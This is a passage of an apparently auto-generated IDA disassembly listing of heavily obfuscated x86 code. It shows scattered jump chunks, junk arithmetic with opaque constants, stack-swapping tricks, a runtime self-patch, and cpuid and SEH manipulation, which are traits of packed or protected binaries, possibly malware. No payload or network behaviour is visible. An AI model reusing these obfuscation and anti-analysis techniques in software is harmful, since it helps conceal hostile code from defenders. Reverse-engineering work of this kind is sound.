; START OF FUNCTION CHUNK FOR sub_428993
loc_428D38: ; CODE XREF: sub_428993+23C9�j
jmp loc_427E2A
; END OF FUNCTION CHUNK FOR sub_428993
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_428D3D: ; CODE XREF: sub_42B9CF+87�j
call sub_42C057
jmp loc_427AA5
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
loc_428D47: ; CODE XREF: _94j21ax3:00422E6F�j
jnz loc_428A7F
and ecx, 196B36Eh
cdq
or ebx, 75EBE97Ch
loc_428D5A: ; CODE XREF: _94j21ax3:loc_42B4A2�j
mov byte ptr [ebp-806h], 0
mov byte ptr [ebp-805h], 0
mov byte ptr [ebp-804h], 0
mov byte ptr [ebp-803h], 0
jmp loc_427AB8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_428D7B: ; CODE XREF: sub_421D33+379�j
jge loc_4255DC
jge loc_42157B
shr ebx, 5
jmp loc_4255DC
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_428D8F: ; CODE XREF: sub_42A268-6D3E�j
; sub_423324+70B0�j
cmp edx, 76C1FC9Bh
jmp loc_4283C5
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
pushf
jmp sub_4255BF
; ---------------------------------------------------------------------------
loc_428DA0: ; CODE XREF: _94j21ax3:0042655D�j
sbb ebx, 0FE91EA75h
; =============== S U B R O U T I N E =======================================
sub_428DA6 proc near ; CODE XREF: _94j21ax3:00428453�p
; FUNCTION CHUNK AT 004275EB SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042A4CD SIZE 00000005 BYTES
mov [esp+0], ecx
pop ecx
and al, 7
mov [ebp-0Bh], al
xor eax, eax
jmp loc_4275EB
sub_428DA6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42106D
loc_428DB6: ; CODE XREF: sub_42106D+3�j
; sub_423324:loc_4293C1�j
push ecx
mov esp, ebp
push offset loc_422AC2
jmp nullsub_121
; END OF FUNCTION CHUNK FOR sub_42106D
; ---------------------------------------------------------------------------
mov edx, 0F75CA70h
call sub_4239A5
push eax
ror eax, 6
mov ds:dword_429F80, eax
jmp locret_425ACA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422FBC
loc_428DDC: ; CODE XREF: sub_422FBC:loc_4240DE�j
mov esp, ebp
pop ebp
mov eax, ds:dword_4256C0
or eax, eax
loc_428DE7: ; CODE XREF: _94j21ax3:loc_4266C5�j
jnz loc_429B20
jmp loc_424806
; END OF FUNCTION CHUNK FOR sub_422FBC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_428DF2: ; CODE XREF: sub_42484C:loc_429CD7�j
cmp dword ptr [ebp-10h], 0
jnz loc_429C57
mov eax, [ebp+8]
push eax
jmp loc_423AB1
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BBF9
loc_428E05: ; CODE XREF: sub_42BBF9+E�j
push esi
push 4C0E1F80h
pop esi
add esi, 0B4343B29h
xchg esi, [esp+4+var_4]
jmp loc_42810E
; END OF FUNCTION CHUNK FOR sub_42BBF9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428C49
loc_428E1A: ; CODE XREF: sub_428C49:loc_42996F�j
popf
push eax
push offset sub_427EBE
jmp loc_42A37F
; END OF FUNCTION CHUNK FOR sub_428C49
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_428E26: ; CODE XREF: sub_42C0BC-54F8�j
jb loc_42259C
popf
; END OF FUNCTION CHUNK FOR sub_42C0BC
; START OF FUNCTION CHUNK FOR sub_42983E
loc_428E2D: ; CODE XREF: sub_42983E:loc_42190B�j
; sub_42C0BC:loc_42C163�j
pop large dword ptr fs:0
push offset loc_425709
jmp loc_423C39
; END OF FUNCTION CHUNK FOR sub_42983E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42266A
loc_428E3E: ; CODE XREF: sub_42266A:loc_421789�j
push offset sub_42A9F4
jmp nullsub_189
; END OF FUNCTION CHUNK FOR sub_42266A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_428E48: ; CODE XREF: sub_422EB0+52AB�j
jnz loc_42BC7E
loc_428E4E: ; CODE XREF: _94j21ax3:004289A8�j
jmp loc_42546B
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A56
loc_428E53: ; CODE XREF: sub_423A56+A�j
jnz loc_4263F2
jmp loc_42BBD0
; END OF FUNCTION CHUNK FOR sub_423A56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429DCC
loc_428E5E: ; CODE XREF: sub_429DCC:loc_429DD7�j
jge loc_424FF5
loc_428E64: ; CODE XREF: sub_422CA6+667F�j
mov [esi], ebx
jmp loc_424FF3
; END OF FUNCTION CHUNK FOR sub_429DCC
; ---------------------------------------------------------------------------
test eax, eax
jnz loc_4225C8
jmp loc_426AF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F65
loc_428E78: ; CODE XREF: sub_428F65-661D�j
jz loc_4256F8
; END OF FUNCTION CHUNK FOR sub_428F65
; START OF FUNCTION CHUNK FOR sub_425983
loc_428E7E: ; CODE XREF: sub_425983-1177�j
jmp loc_428AB6
; END OF FUNCTION CHUNK FOR sub_425983
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BF8
loc_428E83: ; CODE XREF: sub_423BF8+8�j
jmp loc_42689A
; END OF FUNCTION CHUNK FOR sub_423BF8
; ---------------------------------------------------------------------------
popf
sub eax, ebx
jmp loc_4256F5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_97. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_428E91: ; CODE XREF: sub_42284F+80E7�j
jz loc_4236FB
jmp loc_424048
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428954
loc_428E9C: ; CODE XREF: sub_428954+13�j
dec eax
test eax, eax
jl loc_427103
inc eax
mov [ebp-1Ch], eax
mov dword ptr [ebp-18h], 0
loc_428EB0: ; CODE XREF: _94j21ax3:00421EA2�j
mov eax, [ebp-4]
mov edx, [ebp-14h]
jmp loc_428504
; END OF FUNCTION CHUNK FOR sub_428954
; =============== S U B R O U T I N E =======================================
sub_428EBB proc near ; CODE XREF: sub_421A4F:loc_421A59�p
; _94j21ax3:00427E4C�j
; FUNCTION CHUNK AT 004222DA SIZE 0000001A BYTES
xchg edx, [esp+0]
pop edx
mov eax, [ebp+8]
push eax
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
loc_428ECD: ; CODE XREF: sub_423081:loc_42B2D7�j
setz al
call sub_4215F9
loc_428ED5: ; CODE XREF: _94j21ax3:00429BD5�j
jmp loc_4222DA
sub_428EBB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428EDA proc near ; DATA XREF: sub_429550:loc_42955B�o
; FUNCTION CHUNK AT 00421B22 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00421F62 SIZE 00000003 BYTES
call sub_4215F9
pop ecx
shl eax, 3
call sub_429C48
loc_428EE8: ; CODE XREF: sub_422898+17�j
jmp loc_421B22
sub_428EDA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426716
loc_428EED: ; CODE XREF: sub_426716:loc_4277D8�j
sub ebp, 0DE26A813h
loc_428EF3: ; CODE XREF: sub_428381:loc_42A249�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call eax
push esi
jmp loc_42A229
; END OF FUNCTION CHUNK FOR sub_426716
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_18. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_428F05: ; CODE XREF: _94j21ax3:00426711�j
jz loc_4286B2
jmp loc_42BAE2
; ---------------------------------------------------------------------------
and ebx, ebp
jmp loc_42A77C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B71E
loc_428F17: ; CODE XREF: sub_42B71E-9ABE�j
add ecx, ebp
add ecx, 7A493468h
mov [ecx], al
pop ecx
jmp loc_426C46
; END OF FUNCTION CHUNK FOR sub_42B71E
; ---------------------------------------------------------------------------
or eax, ecx
jmp sub_42426B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_428F2E: ; CODE XREF: sub_42284F:loc_4227A2�j
jz loc_429D5D
jp loc_4272F8
jle loc_4274F7
jno loc_42AE83
jmp loc_42B7DD
; END OF FUNCTION CHUNK FOR sub_42284F
; =============== S U B R O U T I N E =======================================
sub_428F4B proc near ; DATA XREF: sub_428A1C+C�o
add edx, 79AD48C0h
add edx, eax
add edx, 8612B72Bh
mov dword ptr [edx], 1000h
sub_428F4B endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_149. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42269A
loc_428F60: ; CODE XREF: sub_42269A+7958�j
jmp sub_4239A5
; END OF FUNCTION CHUNK FOR sub_42269A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428F65 proc near ; CODE XREF: _94j21ax3:00422D53�p
; sub_429DCC-4DCB�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00421210 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00422828 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422930 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004249DC SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004256F8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00428E78 SIZE 00000006 BYTES
push ebp
mov ebp, esp
jmp loc_4249DC
sub_428F65 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428F6D proc near ; DATA XREF: sub_422141+874A�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004242D3 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042B67D SIZE 00000012 BYTES
pushf
mov [esp+0], eax
call sub_42A61F
push eax
call sub_423094
loc_428F7C: ; CODE XREF: sub_422866+411A�j
jmp loc_42B67D
sub_428F6D endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_145. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_428F82: ; CODE XREF: sub_422EB0+8EE7�j
jmp loc_4292A0
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABB1
loc_428F87: ; CODE XREF: sub_42ABB1+10�j
jmp loc_4282F7
; END OF FUNCTION CHUNK FOR sub_42ABB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429CAE
loc_428F8C: ; CODE XREF: sub_429CAE:loc_421C20�j
call sub_429964
loc_428F91: ; CODE XREF: sub_422973:loc_4217A2�j
push offset loc_422A47
jmp loc_4222C3
; END OF FUNCTION CHUNK FOR sub_429CAE
; ---------------------------------------------------------------------------
xor ecx, 7EE0E83Eh
jle loc_428D04
jmp sub_42966A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_210. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_125. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421558
loc_428FAE: ; CODE XREF: sub_421558+1B�j
jmp loc_429792
; END OF FUNCTION CHUNK FOR sub_421558
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_428FB3: ; CODE XREF: sub_421402+15CA�j
adc esi, 5E749BCFh
sub esi, 0A7D8ED23h
jmp loc_4284D1
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42764C
loc_428FC4: ; CODE XREF: sub_42764C:loc_42A1B5�j
pop ecx
mov [ebp-20h], eax
; END OF FUNCTION CHUNK FOR sub_42764C
; START OF FUNCTION CHUNK FOR sub_426626
loc_428FC8: ; CODE XREF: sub_426626:loc_42474E�j
; sub_421D33+307C�j ...
jo loc_42BC6F
test byte ptr [ebp-8], 40h
jz loc_4288E4
push ebp
mov eax, [ebp-20h]
jmp loc_428443
; END OF FUNCTION CHUNK FOR sub_426626
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_84. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422790
loc_428FE2: ; CODE XREF: sub_422790+9149�j
jmp loc_42864B
; END OF FUNCTION CHUNK FOR sub_422790
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AE5A
loc_428FE7: ; CODE XREF: sub_42AE5A+83A�j
jmp loc_422347
; END OF FUNCTION CHUNK FOR sub_42AE5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429862
loc_428FEC: ; CODE XREF: sub_429862+9�j
jmp loc_42834A
; END OF FUNCTION CHUNK FOR sub_429862
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4281A5
loc_428FF1: ; CODE XREF: sub_4281A5-9F2�j
jmp loc_429339
; END OF FUNCTION CHUNK FOR sub_4281A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42430C
loc_428FF6: ; CODE XREF: sub_42430C-DA4�j
jmp loc_42977A
; END OF FUNCTION CHUNK FOR sub_42430C
; =============== S U B R O U T I N E =======================================
sub_428FFB proc near ; DATA XREF: _94j21ax3:0042BA66�o
; FUNCTION CHUNK AT 00422138 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042693D SIZE 00000005 BYTES
xor dword ptr [esp+0], 49FF4951h
push 0
loc_429004: ; CODE XREF: _94j21ax3:00429069�j
push 5DAD82D4h
adc eax, esi
jmp loc_42693D
sub_428FFB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
cmp ebx, ecx
jmp loc_424FD7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4221B8
loc_429017: ; CODE XREF: sub_4221B8:loc_429356�j
jnz loc_427307
loc_42901D: ; CODE XREF: sub_42315D+8C73�j
jmp loc_42416F
; END OF FUNCTION CHUNK FOR sub_4221B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_429022: ; CODE XREF: sub_42284F+7E9B�j
jmp loc_4274EC
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
push edi
or ebx, edx
rol eax, 9
jmp loc_427307
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_429032: ; CODE XREF: sub_423324-1C15�j
mov [ebp-4], eax
call sub_429974
mov ds:dword_423454, eax
xor eax, eax
push esi
push 76CBA123h
pop esi
jmp loc_429F28
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
cmp eax, ecx
jmp loc_422E2F
; =============== S U B R O U T I N E =======================================
sub_429054 proc near ; CODE XREF: _94j21ax3:0042A051�j
; sub_427CB6:loc_42B1E2�p
mov [esp+0], ebx
pop ebx
xor edx, edx
call sub_428AE1
sub_429054 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_422538
loc_42905F: ; CODE XREF: sub_422538+D�j
; sub_427004+A�j
mov eax, ds:dword_4256CC
jmp loc_424E8E
; END OF FUNCTION CHUNK FOR sub_422538
; ---------------------------------------------------------------------------
jo loc_429004
jge loc_426906
jmp sub_421C65
; ---------------------------------------------------------------------------
loc_42907A: ; DATA XREF: sub_423B04+9�o
xor eax, eax
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
call sub_42A8CD
; START OF FUNCTION CHUNK FOR sub_423324
loc_429088: ; CODE XREF: sub_423324+8FF1�j
jmp loc_426D3D
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
add esi, 0CE7E6AE3h
jmp loc_42B560
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429629
loc_429098: ; CODE XREF: sub_429629:loc_42963B�j
cmp byte ptr [ebp-5], 0
jnz loc_424949
jmp loc_428562
; END OF FUNCTION CHUNK FOR sub_429629
; ---------------------------------------------------------------------------
sub eax, 6EA7969Eh
jmp sub_422B4F
; =============== S U B R O U T I N E =======================================
sub_4290B2 proc near ; CODE XREF: sub_422C48+2DD3�p
; FUNCTION CHUNK AT 0042310A SIZE 0000000A BYTES
xchg ecx, [esp+0]
mov ecx, [esp+0]
mov esp, ebp
pop ebp
jmp loc_42310A
sub_4290B2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4290C0 proc near ; CODE XREF: sub_426716:loc_42AAFE�p
; _94j21ax3:0042ADF3�j
arg_0 = dword ptr 4
mov [esp+0], edx
pop edx
mov eax, [ebp-4]
mov ecx, offset loc_4265B3
xchg ecx, [esp-4+arg_0]
retn
sub_4290C0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4254AE
loc_4290D0: ; CODE XREF: sub_4254AE+C�j
jmp loc_426401
; END OF FUNCTION CHUNK FOR sub_4254AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_4290D5: ; CODE XREF: sub_42484C+3621�j
push offset sub_4298A8
jmp loc_42A6FE
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4214E6
loc_4290DF: ; CODE XREF: sub_4214E6+1479�j
jnz loc_42B272
jmp loc_4233F1
; END OF FUNCTION CHUNK FOR sub_4214E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425539
loc_4290EA: ; CODE XREF: sub_425539:loc_42135D�j
mov ebp, esp
add esp, 0FFFFFFF4h
mov [ebp-4], eax
mov eax, [ebp-4]
jmp loc_42378F
; END OF FUNCTION CHUNK FOR sub_425539
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_4290FA: ; CODE XREF: sub_423FCD:loc_42B064�j
or esi, 0AD3B83A9h
shl edx, 8
jmp loc_426A49
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
locret_429108: ; CODE XREF: _94j21ax3:00427321�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427668
loc_429109: ; CODE XREF: sub_427668+C�j
jmp loc_42A8AF
; END OF FUNCTION CHUNK FOR sub_427668
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_42910E: ; CODE XREF: sub_42169F+4DFF�j
jmp loc_42B647
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
loc_429113: ; CODE XREF: _94j21ax3:004229E5�j
jmp loc_425908
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4216D0
loc_429118: ; CODE XREF: sub_4216D0+9�j
jmp loc_42C51A
; END OF FUNCTION CHUNK FOR sub_4216D0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AC2D
loc_42911D: ; CODE XREF: sub_42AC2D-71A6�j
; sub_42134B:loc_429BF1�j
push 0
push 0
push 10h
mov eax, [ebp-8]
; END OF FUNCTION CHUNK FOR sub_42AC2D
; START OF FUNCTION CHUNK FOR sub_421330
loc_429126: ; CODE XREF: sub_421330:loc_4269B1�j
push eax
jmp loc_4227F0
; END OF FUNCTION CHUNK FOR sub_421330
; ---------------------------------------------------------------------------
loc_42912C: ; CODE XREF: _94j21ax3:0042AC98�j
popf
xchg ecx, [edi]
; START OF FUNCTION CHUNK FOR sub_42169F
loc_42912F: ; CODE XREF: sub_42169F:loc_42AC87�j
add esi, 3EF2592Eh
xchg esi, [esp-0Ch+arg_8]
loc_429138: ; CODE XREF: sub_4214E6+9D9F�j
jmp sub_425A09
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A7A6
loc_42913D: ; CODE XREF: sub_42A7A6+4�j
inc ds:dword_42343C
lea eax, nullsub_4
mov byte ptr [eax], 0C3h
call nullsub_9
push ecx
push 0E51E1EB6h
pop ecx
add ecx, 2691740Eh
jmp loc_42843E
; END OF FUNCTION CHUNK FOR sub_42A7A6
; =============== S U B R O U T I N E =======================================
sub_429163 proc near ; CODE XREF: _94j21ax3:00423F4E�p
; _94j21ax3:0042B336�j
xchg ecx, [esp+0]
pop ecx
jmp loc_4280CD
sub_429163 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jmp loc_423AB6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_429171: ; CODE XREF: sub_42A0CC:loc_4298E4�j
call sub_422764
loc_429176: ; CODE XREF: sub_4251F2+C�j
jmp loc_426D93
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428AE1
loc_42917B: ; CODE XREF: sub_428AE1:loc_428C2C�j
xor edi, 0A2E63FD0h
test edi, 100h
jmp loc_42341C
; END OF FUNCTION CHUNK FOR sub_428AE1
; ---------------------------------------------------------------------------
loc_42918C: ; CODE XREF: _94j21ax3:004283B5�j
add ebx, 0E01E918Ah
xchg ebx, [esp]
jmp sub_42C057
; ---------------------------------------------------------------------------
push offset sub_422CA6
jmp loc_42531F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4291A4: ; CODE XREF: sub_42284F+F2D�j
jz loc_42A566
jmp loc_4219A0
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421ABD
loc_4291AF: ; CODE XREF: sub_421ABD:loc_42A703�j
mov ecx, ebp
pop ebp
push offset sub_42A061
jmp loc_42B8B7
; END OF FUNCTION CHUNK FOR sub_421ABD
; =============== S U B R O U T I N E =======================================
sub_4291BC proc near ; CODE XREF: sub_422F0A+A�p
; _94j21ax3:00427900�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00421B62 SIZE 00000014 BYTES
mov [esp+0], esi
pop esi
add eax, [esp+0]
adc edx, [esp+arg_0]
add esp, 8
jmp loc_421B62
sub_4291BC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_4291CF: ; CODE XREF: sub_423FCD+7114�j
jz loc_427AC3
or esi, ebx
jmp loc_42BB6B
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
loc_4291DC: ; CODE XREF: _94j21ax3:loc_428B29�j
jnz loc_42528E
loc_4291E2: ; CODE XREF: _94j21ax3:0042A678�j
jmp loc_423047
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AE5A
loc_4291E7: ; CODE XREF: sub_42AE5A-8801�j
jmp loc_421C93
; END OF FUNCTION CHUNK FOR sub_42AE5A
; ---------------------------------------------------------------------------
mov esi, ecx
popf
jmp loc_425284
; ---------------------------------------------------------------------------
locret_4291F4: ; CODE XREF: _94j21ax3:00429FD0�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422392
loc_4291F5: ; CODE XREF: sub_422392-11A3�j
jmp loc_423398
; END OF FUNCTION CHUNK FOR sub_422392
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_4291FA: ; CODE XREF: sub_421F28:loc_427921�j
xor ecx, ecx
xor edx, edx
cpuid
call sub_42A430
loc_429205: ; CODE XREF: sub_427C35-2D86�j
jmp loc_42B1A8
; END OF FUNCTION CHUNK FOR sub_421F28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_42920A: ; CODE XREF: sub_4294B3:loc_429378�j
jnz loc_4299AB
jmp loc_422A86
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42265F
loc_429215: ; CODE XREF: sub_42265F:loc_42317F�j
push eax
call sub_423F43
retn
; END OF FUNCTION CHUNK FOR sub_42265F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42921C proc near ; CODE XREF: sub_421CAA+56A6�p
push ebp
mov ebp, esp
jmp sub_421480
sub_42921C endp
; ---------------------------------------------------------------------------
loc_429224: ; CODE XREF: _94j21ax3:004274D6�j
adc ebx, 3E9DF270h
; =============== S U B R O U T I N E =======================================
sub_42922A proc near ; CODE XREF: sub_423F55+B4E�p
; FUNCTION CHUNK AT 004257EE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428730 SIZE 0000000F BYTES
mov [esp+0], edx
pop edx
add eax, ebp
add eax, 5DFEEE65h
jmp loc_428730
sub_42922A endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_139. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42923C: ; CODE XREF: _94j21ax3:0042458F�j
mov [eax], edi
test eax, edi
jmp loc_4259D5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4248E7
loc_429245: ; CODE XREF: sub_4248E7:loc_421FFD�j
xor edi, 0D462F6AEh
push edi
jmp loc_42B781
; END OF FUNCTION CHUNK FOR sub_4248E7
; =============== S U B R O U T I N E =======================================
sub_429251 proc near ; CODE XREF: _94j21ax3:00423500�p
; _94j21ax3:00425497�j
xchg eax, [esp+0]
pop eax
sub_429251 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_422C48
loc_429255: ; CODE XREF: sub_422C48:loc_428AC7�j
xchg edx, [esp+4+var_4]
retn
; END OF FUNCTION CHUNK FOR sub_422C48
; =============== S U B R O U T I N E =======================================
sub_429259 proc near ; DATA XREF: _94j21ax3:loc_4234FB�o
; FUNCTION CHUNK AT 004231B2 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00426A2F SIZE 00000005 BYTES
sub edx, 638301D7h
jmp loc_426A2F
sub_429259 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424627
loc_429264: ; CODE XREF: sub_424627+5CCC�j
pop eax
pop ebp
jmp loc_426485
; ---------------------------------------------------------------------------
loc_42926B: ; CODE XREF: sub_424627+67A4�j
or ecx, edx
sbb ebx, edx
adc ecx, 21AB3A65h
xchg edi, [esp+0]
mov edx, edi
pop edi
jmp loc_4217CD
; END OF FUNCTION CHUNK FOR sub_424627
; =============== S U B R O U T I N E =======================================
sub_429280 proc near ; CODE XREF: sub_4215F9+E�p
; FUNCTION CHUNK AT 00429B5A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042AA31 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042BB58 SIZE 00000013 BYTES
mov [esp+0], ecx
push ebx
push eax
push edx
js loc_42BB58
or ebx, edx
sbb eax, 1ACC46B8h
jmp loc_422FD7
sub_429280 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
cmp edx, edi
jmp loc_42274A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_4292A0: ; CODE XREF: sub_422EB0:loc_428F82�j
add eax, [esp+4+var_4]
adc edx, [esp+4]
add esp, 8
movzx eax, word ptr [eax]
shl eax, 2
mov edx, [ebp-14h]
jmp loc_421BA3
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
shr esi, 1Ch
jmp sub_42169F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42134B
loc_4292C0: ; CODE XREF: sub_42134B+6D40�j
push 0F1B52064h
sbb esi, 63E90C0Bh
jmp loc_42AD19
; END OF FUNCTION CHUNK FOR sub_42134B
; ---------------------------------------------------------------------------
xchg ebx, ebp
jmp sub_424BAA
; =============== S U B R O U T I N E =======================================
sub_4292D7 proc near ; CODE XREF: _94j21ax3:00425595�j
; sub_4272E9:loc_42A4C6�p
xchg eax, [esp+0]
pop eax
call sub_42AC17
retn
sub_4292D7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_4292E1: ; CODE XREF: sub_4272E9-19C6�j
call nullsub_4
loc_4292E6: ; CODE XREF: _94j21ax3:0042A330�j
jo loc_42976D
call sub_42C057
test al, al
jmp loc_42969F
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_4292F8: ; CODE XREF: sub_422EB0+724F�j
jz loc_428555
jmp loc_42AE17
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4259BF
loc_429303: ; CODE XREF: sub_4259BF:loc_428C18�j
call sub_424B76
loc_429308: ; CODE XREF: sub_4226AE+88C0�j
jmp loc_425943
; END OF FUNCTION CHUNK FOR sub_4259BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429CAE
